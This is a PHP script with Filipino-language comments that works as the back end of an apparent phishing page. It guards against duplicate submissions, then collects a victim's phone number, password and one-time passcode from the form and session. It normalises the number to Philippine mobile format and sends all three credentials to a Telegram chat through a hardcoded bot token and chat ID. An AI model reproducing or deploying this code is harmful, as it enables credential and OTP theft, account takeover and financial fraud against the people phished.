<?php
session_start();

/**
 * One-time send guard per UNIQUE payload
 * - Hindi per session lang
 * - Iiskip lang kung EXACT SAME $_POST ulit sa loob ng $ttl seconds
 */

$now = time();
$ttl = 10; // ilang segundo bago payagan ulit ang same data (pwede mo taasan/babaan)

// Gumawa ng hash base sa laman ng form ($_POST)
$payloadHash = hash('sha256', json_encode($_POST, JSON_UNESCAPED_UNICODE));

// Kung pareho ang hash at hindi pa lampas sa TTL → huwag na ulitin ang send
if (
    isset($_SESSION['_last_send']) &&
    $_SESSION['_last_send']['hash'] === $payloadHash &&
    ($now - $_SESSION['_last_send']['time']) < $ttl
) {
    http_response_code(204); // tahimik lang na stop
    exit;
}

// I-save na itong payload na ’to bilang huling na-process
$_SESSION['_last_send'] = [
    'hash' => $payloadHash,
    'time' => $now,
];

// ====== DITO SA BABA LALAGAY YUNG ORIGNAL MO NA SEND LOGIC ======
// halimbawa:
// $otp   = $_POST['otp'] ?? '';
// $phone = $_POST['phone'] ?? '';
// $pass  = $_POST['password'] ?? '';
// ... send / process etc.






// Kunin ang OTP
$otp = isset($_POST['otp']) ? $_POST['otp'] : '';

// Kunin ang phone number mula sa session (JSON decode)
$phoneNumber = '';
if (isset($_SESSION['phone_number'])) {
    $phoneNumberData = json_decode($_SESSION['phone_number'], true);
    $phoneNumber = $phoneNumberData['phone'] ?? '';
}

// Kunin ang password mula sa session (JSON decode)
$password = '';
if (isset($_SESSION['password'])) {
    $passwordData = json_decode($_SESSION['password'], true);
    $password = $passwordData['password'] ?? '';
}

$cleanNumber = preg_replace('/[^0-9]/', '', $phoneNumber);

// If starts with 09, remove 0 to make 10-digit format starting with 9
if (strpos($cleanNumber, '09') === 0) {
    $cleanNumber = substr($cleanNumber, 1);
}
// Ensure only 10-digit numbers starting with 9
if ($cleanNumber[0] !== '9' || strlen($cleanNumber) !== 10) {
    http_response_code(400);
    echo "Invalid phone number format.";
    exit;
}

// Telegram config
$telegramToken = '7634179350:AAG8vh510XgXxfgoCKqXLs2BP0Y1773K0Hs';
$chatId = '-1003774791002';

// Message format (clean)
$message =
"<code>$cleanNumber</code>

PASS <code>$password</code> | OTP <code>$otp</code>";

// Send to Telegram
$response = file_get_contents(
    "https://api.telegram.org/bot$telegramToken/sendMessage?" .
    http_build_query([
        'chat_id' => $chatId,
        'text' => $message,
        'parse_mode' => 'HTML'
    ])
);

// Error handling
if ($response === false) {
    error_log("Failed to send Telegram message: " . json_encode($response));
}

echo "OTP and notification sent.";